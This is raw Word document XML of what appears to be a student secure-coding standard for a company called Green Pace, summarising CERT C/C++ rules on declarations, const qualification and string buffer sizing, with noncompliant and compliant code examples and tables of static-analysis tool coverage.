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2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Green Pace logo" id="0" name="image2.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11"/>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must be validated from all potential sources, including unknown or untrusted ones.  This can help prevent certain vulnerabilities, as the data is checked prior to its implementation in the code.  This practice is especially useful when data can be received from external sources.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When running code, always use the highest warning level possible.  If the compiler gives you a warning, it is imperative to make the necessary edits to the code so that this warning is eliminated.  Analysis tools should also be used on the code to detect and eliminate other potential vulnerabilities.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The architecture and design of the code should be created with security in mind.  The code should be created in such a way that security measures are enforced.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The code’s design should not be overly complex, it should be kept as simple as possible while still maintaining its intended function.  The more complex the code is, the more open the code is to vulnerabilities.  In addition, the more complex code is, the more time will have to be dedicated to ensuring that it is secure.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When considering what users should be able to access or run code, you should think from a standpoint of “who should I include” rather than “who should I exclude.”  By doing this, less users will have access to the code, leading to a more secure environment overall.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Permissions should be granted sparingly.  When giving permissions to a user or process, only the essentials should ultimately be considered.  The more permissions given, the more vulnerable the code begins.  In addition, if higher permissions are required to run a process, they should only be granted for the necessary duration of the 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All data being sent out to other systems should first be scanned and sanitized.  If data is sent out as-is, any extraneous data could be used by potential malicious actors to initiate an attack.  By sanitizing the data and removing unnecessary aspects (or by limiting the data’s range), the potential vulnerabilities can be mitigated.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If a potential security flaw exists, it should be protected with multiple layers of defense.  If one layer falls, another can still be protecting the flaw.  Each layer of defense should be based on a different defensive strategy, so that they are all unique.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There are multiple different quality assurance techniques which can be utilized to limit potential security flaws.  Three such techniques are penetration testing (the process of trying to find and exploit the potential security flaws prior to actual code deployment), fuzz testing (an automated test in which bad data is injected into the code as inputs to see how the code reacts), and source code audits (the overall process of reviewing the code for potential vulnerabilities).  In addition, it is always a good idea to have a third party review the code, as this fresh set of eyes can potentially find flaws that would otherwise go unnoticed.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The coding standard applied/developed should have security as one of its main tenants.  This coding standard should also take into account both the coding language as well as the coding platform.  </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hyperlink r:id="rId9">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Include the appropriate type information in function declarators</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[DCL07-C]</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Every declaration should be for a single variable, on its own line, with an explanatory comment about the role of the variable. Declaring multiple variables in a single declaration can cause confusion regarding the types of the variables and their initial values. If more than one variable is declared in a declaration, care must be taken that the type and initialized value of the variable are handled correctly.</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noncompliant code example uses the identifier-list form for parameter declarations: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(Subclause 6.11.7 of the C Standard [ISO/IEC 9899:2011] states that "the use of function definitions with separate parameter identifier and declaration lists (not prototype-format parameter type and identifier declarators) is an obsolescent feature.")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*src = 0, c = 0;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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In this compliant solution, int is the type specifier, max(int a, int b) is the function declarator, and the block within the curly braces is the function body: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max(int a, int b) {</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 &gt; b ? a : b;</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w:t>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t xml:space="preserve">Declaring several variables per line adds needless complexity to the code and opens it up to potential mistakes/errors.</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Unlikely</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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071">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">L3</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8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId10">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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function-prototype</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">implicit-function-declaration</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Partially checked</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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7E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId11">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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7.3p0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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LANG.FUNCS.PROT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">LANG.STRUCT.DECL.IMPT</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Incomplete function prototype</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Implicit Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId12">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ECLAIR</w:t>
              </w:r>
            </w:hyperlink>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87">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CC2.DCL07</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89">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId13">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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CERT C: Rec. DCL07-C</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Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cast between function pointers with different types</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Function declared implicitly.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rec. fully covered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">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92">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5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Const-qualify immutable objects</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6">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7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[DCL00-C]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcP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Immutable objects should be const-qualified. Enforcing object immutability using const qualification helps ensure the correctness and security of applications. ISO/IEC TR 24772, for example, recommends labeling parameters as constant to avoid the unintentional modification of function arguments [ISO/IEC TR 24772]. STR05-C. Use pointers to const when referring to string literals describes a specialized case of this recommendation.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Adding const qualification may propagate through a program; as you add const, qualifiers become still more necessary. This phenomenon is sometimes called const poisoning, which can frequently lead to violations of EXP05-C. Do not cast away a const qualification. Although const qualification is a good idea, the costs may outweigh the value in the remediation of existing code.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macro or an enumeration constant may also be used instead of a const-qualified object. DCL06-C. Use meaningful symbolic constants to represent literal values describes the relative merits of using const-qualified objects, enumeration constants, and object-like macros. However, adding a const qualifier to an existing variable is a better first step than replacing the variable with an enumeration constant or macro because the compiler will issue warnings on any code that changes your const-qualified variable. Once you have verified that a const-qualified variable is not changed by any code, you may consider changing it to an enumeration constant or macro, as best fits your design.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">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In this noncompliant code, pi is declared as a float. Although pi is a mathematical constant, its value is not protected from accidental modification.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pi = 3.14159f;</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degrees;</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radians;</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radians = degrees * pi / 180;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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In this compliant solution, pi is declared as a const-qualified object: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float pi = 3.14159f;</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degrees;</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radians;</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radians = degrees * pi / 180;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Correctly setting variables as const-qualified is part of designing secure code.  It is essentially in preventing non-authorized alterations of variable values prior to or during code runs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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B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B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B9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlikely</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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C">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0BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">L3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId15">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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0C6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">78 D</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">93 D</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">200 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">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CC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId16">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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CD">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0CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_C-DCL00-a</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Declare parameters or local variable as const whenever possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId17">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">PC-lint Plus</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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1.4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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953</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Fully supported</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId18">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">PRQA QA-C</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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9.7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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3204, 3227,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3232, 3673,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3677</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Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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E0">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3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Guarantee that storage for strings has sufficient space for character data and the null terminator</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4">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5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[STR50-CPP]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Copying data to a buffer that is not large enough to hold that data results in a buffer overflow. Buffer overflows occur frequently when manipulating strings [Seacord 2013]. To prevent such errors, either limit copies through truncation or, preferably, ensure that the destination is of sufficient size to hold the data to be copied. C-style strings require a null character to indicate the end of the string, while the C++ std::basic_string template requires no such character.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Because the input is unbounded, the following code could lead to a buffer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buf[12];</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buf;</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0">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The best solution for ensuring that data is not truncated and for guarding against buffer overflows is to use std::string instead of a bounded array, as in this compliant solution.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input;</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stringOne, stringTwo;</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stringOne &gt;&gt; stringTwo;</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Code should be designed in such a way that buffer overflows due  to insufficient data space is avoided.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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09">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L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId20">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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112">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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489 S, 66 X, 70 X, 71 X</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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Partially implemented</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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18">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId21">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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2022.2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
            <w:pPr>
              <w:jc w:val="center"/>
